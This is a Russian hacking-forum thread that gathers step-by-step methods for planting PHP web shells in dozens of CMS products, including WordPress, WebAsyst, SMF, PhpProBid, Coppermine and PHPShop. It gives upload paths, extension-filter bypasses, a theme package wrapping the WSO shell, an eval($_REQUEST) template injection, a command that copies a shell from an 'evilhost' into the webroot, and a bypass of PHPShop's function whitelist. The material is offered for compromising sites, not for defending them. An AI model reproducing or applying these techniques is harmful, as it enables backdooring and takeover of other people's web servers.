Заливка шелла в CMS|Blogs
Решил собрать все вместе, да бы уменьшить бояновые темы в разделе. Все вопросы, касающиеся заливки шелла в CMS, задаем сюда. Приветствуется помощь в наполнении темы актуальным материалом.
CFM(Cold-Fusion) 1 (http://forum.antichat.ru/showpost.php?p=705799&postcount=1)
CMS Phpclanwebsite 1 (http://forum.antichat.ru/showpost.php?p=721865&postcount=79)
CMS Textpattern 1 (http://forum.antichat.ru/thread57443.html)
Danneo CMS 1 (http://forum.antichat.ru/showpost.php?p=249632&postcount=4)
Dayfox Blog 1 (http://forum.antichat.ru/showpost.php?p=662001&postcount=73)
Dinamik_Hip-Hop_portal 1 (http://forum.antichat.ru/showpost.php?p=351989&postcount=9)
DinamikCMS 1 (http://forum.antichat.ru/showpost.php?p=475412&postcount=37)
e107 1 (http://forum.antichat.ru/showpost.php?p=438317&postcount=2)
Exponent CMS 1 (http://forum.antichat.ru/showpost.php?p=767530&postcount=1)
FlashBlog 1 (http://forum.antichat.ru/showpost.php?p=723586&postcount=1)
Gekko CMS 1 (http://forum.antichat.ru/thread60892.html)
JetBox CMS 1 (http://forum.antichat.ru/showpost.php?p=364401&postcount=14)
Joomla 1 (http://forum.antichat.ru/showpost.php?p=522384&postcount=2),2 (http://forum.antichat.ru/showpost.php?p=523103&postcount=9)
Koobi CMS 1 (http://forum.antichat.ru/thread61999.html)
osCommerce 1 (http://forum.antichat.ru/showpost.php?p=698264&postcount=2),2 (http://forum.antichat.ru/showpost.php?p=643166&postcount=69)
PHP-Fusion 1 (http://forum.antichat.ru/showpost.php?p=87309&postcount=12),2 (http://forum.antichat.ru/showpost.php?p=431260&postcount=29),3 (http://forum.antichat.ru/showpost.php?p=454368&postcount=36)
phpWebSite 1 (http://forum.antichat.ru/showpost.php?p=572072&postcount=1)
RunCMS 1 (http://forum.antichat.ru/showpost.php?p=719259&postcount=16)
Sapid 1 (http://forum.antichat.ru/showpost.php?p=402394&postcount=18)
SmallNuke 1 (http://forum.antichat.ru/showpost.php?p=357489&postcount=12)
Subdreamer CMS 1 (http://forum.antichat.ru/showpost.php?p=762650&postcount=1)
WebCodePortalSystem 1 (http://forum.antichat.ru/showpost.php?p=528125&postcount=2)
WR-Meeting 1 (http://forum.antichat.ru/showpost.php?p=692009&postcount=1)

Есть сайт на nginx с WordPress 2.2 версией, нашел юзера с правами постера... при попытке залить шелл в новость скрипт отплевывается и говорит, что php не разрешено заливать по соображениям безопасности.. оно и понятно, несколько раз просмотрел всю ветку про WP и его уязвимости, ничего путного для себя не нашел.. Отцы подскажите, как залить в эту версию шелл )

... в удаленной теме кто-то писал про редактор тем и шаблонов.. но я повторюсь, есть юзер с ограниченными провами ( только постер ).

1. Создаём новую запись в блоге http://localhost/wp-admin/post-new.php
2. И заливаем шелл с расширением php.

1. http://localhost/wordpress/wp-admin/templates.php редактируем файл links.php и вставляем свой код
2. http://localhost/wordpress/wp-content/themes/default/links.php - ваш шелл

1. http://localhost/wordpress/wp-admin/theme-editor.php и редактируем файл 404.php или searchform.php и вставляем свой код
2. http://localhost/wordpress/wp-content/themes/default/404.php - шелл

1. Создаём новую запись в блоге http://localhost/wp-admin/post-new.php
2. И заливаем шелл с расширением php.

Тип файла не подходит по соображениям безопасности. Попробуйте другой. оно ругается )

1. http://localhost/wordpress/wp-admin/templates.php редактируем файл links.php и вставляем свой код
2. http://localhost/wordpress/wp-content/themes/default/links.php - ваш шелл

"..Вы не имеете достаточно прав для доступа к данной странице.'' ) У меня только права постера. ))

TerraShop CMS

Оф. сайт: terrashop.com.ua

Зависимость: админские права

Работаем с файлом /admin/fom_info.php При редактировании категории спокойно льем шелленг вместо картинки! Файлы в обязательном порядке подлежат переименованию, поэтому путь до шелла определяем вручную (вызывая свойства изображения). Шеллег ищем по адресу site/images/categories/[your_shell]

Diem Content Managment Framework

Оф. сайт: diem-project.org

Зависимость: админские права

Заливаемся через медиа менеджер - admin.php/tools/media/media/path

EasyWebManager ver 3.1

Оф. сайт: easywebmanager.com

Зависимость: админские права

Ищем модуль создания товаров/страниц, там можно прикреплять с локального диска изoбражение для товара. К имени шелла дописывается преф thumb_ , ищем шелл в site/files/upload/thumb_[your_shell]

Impresspages CMS

Оф. сайт: impresspages.eu

Зависимость: админские права

Открываем меню developer, выбираем любую вкладку которая имеет форму загрузки и спокойно льем свой shell.php, обновляем страницу! Имеем кривой и практически недееспособный веб-шелл(!) ==> находим в корне сайта файл ip_config.php и заменяем его содержимое на свой шелл-код! Вуаля! Наслаждаемся)

Catera CMS ver 3.0.2

Оф. сайт: Catera.Ru

Зависимость: админские права

Добавляем в настройках новый тип материала - PHP Далее, через модуль редактирования директорий, вместо картинки грузим на сервер шелл. Мы сами определяем директорию для загрузки файла.

Tradingeye CMS ver 6.1

Оф. сайт: tradingeye.com

Зависимость: админские права

1. Admin » File Manager » Add Files (файловый менеджер) - /admin/adminindex.php?action=file.uploadFrm&dir=menu

очень удобно, путь к шеллу выбираем сами )

2. Settings » Company Information » Edit Details (импорт логотипа) - /admin/adminindex.php?action=settings.company&flag=settings

Путь: site/images/company/

3. Admin » Import / Export Products (импорт CSV файла) - admin/adminindex.php?action=csv.home

Путь: site/images/csv/

TDSSE CMS ver 3.22

Оф. сайт: tdsse.com

Зависимость: админские права

Элементарно:

1 /admin.php?d=shabhtml

2 /admin/filemanager.php

3 /admin/imagemanager.php

SBuilder CMS ver 4.015

Оф. сайт: sbuilder.ru

Зависимость: админские права

1. Переходим в раздел настройки модулей (Меню Администратора / Настройки системы / Настройки «Вашего сайта» / Модули) и в поле "Расширения файлов доступных для загрузки" вписываем "php" и сохраняем настройки.

2. Переходим в раздел "Библиотека изображений" (Меню пользователя / Информационное наполнение / Библиотека изображений ) и выбираем "добавить изображение"

2.1 Вкладка «Основные» - Указываем имя изображения , например evil.php =)

2.2 Вкладка «Изображения» указываем адрес нашего веб-шелла. Допустима загрузка с локального диска и с удаленного хоста. При этом необходимо указать адрес веб-шелла во всех трех вариантах: большое изображение, среднее изображение, маленькое изображение.

2.3 Нажимаем «сохранить» и переносимся в «библиотеку изображений» где видим наш шелл. Открываем свойства изображения (слева от нашего файла evil.php) и видим полный путь до шелла.

ATOM Content Management System ver 2.0

Оф. сайт: realiseyourdesign.co.uk

Зависимость: админские права

1) site/cms/ftp_add.php

2) site/cms/pictures_add.php?id=[id]&title=[category]

Путь: site/cms/pictures/[your_shell]

Instant Update CMS

Оф. сайт: cubescripts.com

Зависимость: админские права

1) site/manage/editfiles.php

2) site/manage/scripts/assetmanager/assetmanager.php

Заходим в настройки - site/manage/settings.php и добавляем php5 в список допустимых для импорта расширений, а так же, меняем адрес диры в которую происходит импорт(по умолчанию UserFiles), например на - manage/images. в дефолтной папке выполнение php кода запрещено .htaccess'om

RedKey CMS

Оф. сайт: redkeycms.com

Зависимость: админские права

Элементарно, 2 способа:

1) Файловый менеджер - site/admin/index.php?action=file_manager

2) Редактор тем оформления - site/demo/admin/?action=templates&do=edit&file=index.php&template=default&ext=php

Porn CMS

Оф. сайт: camstudiocms.com

Зависимость: админские права

Работаем с файлом site/adm.in/index.php?newml=upload файл зальется с расширением .php.gif

Путь: site/adm.in/upload/[your_shell]

eFront CMS

Оф. сайт: efrontlearning.net

Зависимость: админские права

Пошагово:

Разрешаем редактирование/добавление языков - site/administrator.php?ctg=system_config

Выбираем и редактируем/импортируем язык - site/administrator.php?ctg=language

Путь: site/index.php?bypass_language=your_hacking_language_na me

CMS Website

Оф. сайт: website.is

Зависимость: админские права

xерез модуль - /catalog/control.php?module=files заливаем шелл с расширением .php.blablabla

Viart CMS

Оф. сайт: viart.com

Зависимость: админские права

1) site/admin/admin_fm.php

2) site/admin/admin_upload.php?filetype=banner путь к шеллу виден на странице

site/admin/admin_banner.php

castcom CMS

Оф. сайт: castcom.ru

Зависимость: админские права

На странице - site/admin/system/index.php#banner заливаем шелл с расширением .php.blablabla

Путь: site/uplfile/banner/[your_shell]

Simplacms CMS ver 1.4.2

Оф. сайт: simplacms.ru

Зависимость: админские права

Спасибо TinyMсе(!) - открываем и редактируем новость,каталог,статью и почти все, что душе угодно. справа от кнопки "вставить картинку" есть "файловый менеджер" - открываем. Удаляем враждебно настроенный .htaccess и спокойно заливаемся. по умолчанию http://localhost/file/

Collabtive CMS

Оф. сайт: collabtive.o-dyn.de

Зависимость: админские права

при работе со скриптом - /managefile.php?action=showproject&id=[id]&mode=added все файлы аля .php, .php3, .php4 и прочие ваулируются и переименовываются в txt, не беда, shell.phtml нас вполне устраивает

Intrid CMS

Оф. сайт: intrid.ru

Зависимость: админские права

при работе со скриптом /admin-gallery.php?action=uploadimages&id=0 спокойно заливаем веб-шелл с любым расширением(!)

zoommarket ver 1.0

Оф. сайт: about.zoommarket.ru

Зависимость: админские права

Настраиваем импорт файлов, добавляем интересующее нас расширение, скрипт - main.php?do=settings&key=general Импортируем - /main.php?do=files&act=paste&mode=move

Я кончил

_ucms​админка — site/_ucms/

с проблемой справился так:


заходим в «admin templates», выбираем любую категорию

ставим галочку на «secure_gallery»

переходим на вкладку «admin sections», выбираем раздел

там где «secure image gallery» жмем, new image, грузим шелл, жмем view

PROFIT


WebAsyst​у Konqi в видео (https://antichat.live/threads/220524/), показано, как залить через редактирование шаблона, но сегодня попалась версия, где пхп код не исполнялся.


нужны права админа, заходим в site/system/

жмем «магазин», далее — «настройки»

выбираем «альтернативы оформлению заказа»

включаем «PayPal Website Payments Pro - Express Checkout»

где «сертификат paypal» выбираем наш шелл, жмем сохранить

наш шелл по адресу site/data/SHOP/attachments/SC/temp/shell.php


SMF 1.1.4 через изменения шаблонов (возможно и на более ранних, так и на более поздних версиях)​нужны права администратора.


заходим в «темы оформления»

«изменения тем оформления»

выбираем любую тему оформления, «обзор шаблонов и файлов этой темы оформления»

и редактируем, например index.template.php

профит, наш шелл в индексе
только не забудьте выбрать тему, которую вы изменяли, в настройках.

вроде как ©

Насчет WebAsyst.

Попалась такая версия двига, где папка /data/SHOP/attachments/SC/temp/ закрыта .htaccess и поэтому залить шелл вышеприведенным способом не получается. Точнее залить получается, но толку от этого мало.

Поэтому такой способ:

Нужен доступ в админку.

Заходим в www.site.xx/published/

Затем «Магазин», далее в «Настройки»

Мотаем вниз и находим «Логотип для печатных форм»

Выбираете шелл, жмете «Сохранить»

Теперь ищите шелл по адресу:

www.site.xx/published/publicdata//attachments/SC/images/shell.php

Имя права редактора вmodxможно подняться до администратора. Вот видео записал как это сделать: http://www.youtube.com/watch?v=W3i9ZMZGZSg

А дальше можно залить шелл через обычный файловый редактор или менеджер модулей/сниппетов.

PhpProBid v. 6.10

Оф. сайт: phpprobid.com

Нужны права админа.

Способ №1:

- Заходим в админку, далее Categories -> Edit Category Language Files (Категории -> Редактировать файлы языков категорий);

- Выбираем язык для редактирования, очень желательно не текущий;

- В правой колонке правим php файл языка, вставляем свой код, сохраняем изменения и сверху видим сообщение о успешности и путь файла языка;

- Переходим по вышеуказанному пути и видим исполнение кода.

Способ №2: (Работает не всегда)

- Опять же в админке, переходим в General Settings -> Digital Downloads (Основные настройки -> Цифровые загрузки):

- Ставим галку в Enable Digital Downloads и выставляем в Maximum file size 1000000 KBytes, сохраняем;

- Далее заходим от лица любого юзера в Users Management -> Login as Site User (Управление пользователями -> Войти как пользователь сайта) и создаем новый аукцион;

- Заполняем все поля и жмем Next step;

- Теперь опускаемся вниз к пункту Digital Goods и загружаем свой файл;

- Теперь нужно узнать номер аукциона, это можно сделать, как отследив снифером Post данные и глянув в переменную item_id, так и, например, дойти до Preview и узнать номер в Auction ID;

- Наш шелл будет лежать по следующему пути site.com/dd_folder/dd_A_[номер аукциона]_[название файла].img, например, site.com/dd_folder/dd_A_100006_shell.php.img, причем при переходе на него шелл исполняется за счет предрасширения php.

Полный FAQ по заливке веб-шелла в WordPress​

#1 СПОСОБ:

Зависимости: Аккаунт администратора, права на запись файлов.

Описание: Метод заключается в загрузке веб-шелла через "установку тем оформления".

Инструкция:

1. Внешний вид -> Темы -> Установить темы -> Загрузить, или по ссылке:


/wp-admin/theme-install.php?tab=upload

2. После перехода, видим форму загрузку ZIP архивов:

http://img4.imageshack.us/img4/7546/uploadwppng.png​

Для загрузки веб-шелла, нам нужно поместить его в zip архив, например, сделать это можно через WinRAR. У темы в WordPress есть 2 обязательных файла:


index.php

style.css


В style.css помещаем:


/*
Theme Name: Web-shell
Description: This is web-shell for WP
Author: Zed0x
Version: 2.5 Suid
License: WSO 2.5 Suid, edit by antichat
*/

В index.php:




И третий файл делаем, например wso.php - наш шелл. В итоге мы получаем 3 файла: wso.php, index.php, style.css - все их перемещаем в папку "web-shell" и запаковываем в zip архив -> загружаем на сайт через форму установки темы.

Путь до веб-шелла:


/wp-content/themes/web-shell/wso.php

Download: web-shell for wordpress (http://www.sendspace.com/file/ufoc49)

Загрузка веб-шелла в Coppermine Photo Gallery

Загрузка веб-шелла в Coppermine Photo Gallery​

Зависимости: аккаунт администратора, права на запись.

Описание: Загружать веб-шелл будем через менеджер плагинов в ZIP архиве. Данный способ проверен на последней версии cpg 1.5.20.

Инструкция: В верхнем меню, переходим по адресу Конфигурация -> Менеджер плагинов:

http://img191.imageshack.us/img191/5678/33806227.png​Или по адресу:


/pluginmgr.php

На этой странице видем форму загрузки файлов:

http://img109.imageshack.us/img109/9650/58657966.png ​

Она загружает ZIP архивы, и соответственно распаковывает их в папку соответствующею названию архива. Никакой проверки содержания архива не производится, поэтому нам нужно всего лишь создать zip и поместительность в него один файл - наш шелл.

После загрузки архива, ваш шелл будет доступен по адресу:


/plugins/
shell.php

[COLOR="SandyBrown"][SIZE="2"]B2Evolution

PHPShop & PHPShop CMS Free - Latest Version​

Developers - phpshop.ru , cms.phpshopcms.ru

Need: Admin Access

Admin url: /phpshop/admpanel/

Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"

Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"

Внедряем свой код


@php

eval($_REQUEST[e]);

php@

Смотрим абсолютный путь:


localhost/?e=phpinfo();

Льем шелл:


localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");

↑ (https://antichat.live/posts/3449477/)
PHPShop & PHPShop CMS Free - Latest Version​


обновлю пост, последняя на данный момент версия PHPShop 5.3, список допустимых функций зашит в массив, смотрим на регулярки:

./class/parser.class.php


function Parser($string, $debug = false) {

$dis = @preg_replace_callback("/@([a-zA-Z0-9_]+)@/", 'SysValueReturn', @preg_replace_callback("/(@php)(.*)(php@)/sU", "evalstr", str_replace('+', '+', $string)));

...



function evalstr($str) {
ob_start();
if (parser_function_guard == 'true') {
if (!allowedFunctions($str[2]))
return ob_get_clean();
}
if (eval(stripslashes($str[2])) !== NULL) {
echo (' PHP');
echo (' :');
echo ('');
echo ($str[2]);
echo ('');
return ob_get_clean();
}
return ob_get_clean();
}

...



function allowedFunctions($str) {
$Functions = array(
'if',
'else',
'switch',
'for',
'foreach',
'echo',
'print',
'print_r',
'array',
'isset',
'empty',
'chr',
'__',
'str_replace',
'__hide',
'empty'
);
$allowFunctions = array_merge($Functions, explode(',', parser_function_allowed));
preg_match_all('/\s*([A-Za-z0-9_$]+)\s*\(/isU', $str, $findedFunctions);
$remElements = array_diff($findedFunctions[1], $allowFunctions);
$denyFunctions = explode(',', parser_function_deny);
foreach ($denyFunctions as $deny)
if (stristr($str, $deny))
$remElements[] = $deny;
if (count($remElements) > 0) {
echo (' ');
echo (' :');
echo ('');
foreach ($remElements as $remElement) {
echo ($remElement . '()');
}
echo ('');
echo (' ( phpshop/inc/config.ini [function]):');
echo ('');
foreach ($allowFunctions as $allowFunction) {
echo ($allowFunction . '()
');
}
echo ('');
return false;
} else {
return true;
}
}

создаем страницу или новость

универсальный poc для php5 и php7


@php ?> php@

?a=phpinfo();//